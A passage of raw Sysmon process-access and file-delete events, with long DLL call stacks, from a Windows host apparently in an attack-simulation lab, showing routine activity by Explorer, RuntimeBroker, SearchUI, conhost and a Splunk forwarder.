em32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.875{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.860{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.860{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000011142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.860{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=16AE77ED18A5832431F1B06BF745D409,SHA256=E36F370C50813F581946A2D05E33FBF0574D279BC8D85D427A537A7686E00907,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.860{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.860{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 23542300x800000000000000011139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.422{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0564ACC2251BBC061A6154098B0358CA,SHA256=439EAF70BEBB0B21AB0267D18FB48992E4995C9536E4C042F04DCA3FB575498B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.813{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.813{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.813{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.813{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.813{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+9dc4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+9dc4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.766{266CAFBE-646C-6064-1000-00000000AE01}11242204C:\Windows\system32\svchost.exe{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.766{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.766{266CAFBE-6696-6064-7801-00000000AE01}42641324C:\Windows\system32\conhost.exe{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-64C5-6064-A500-00000000AE01}43566308C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 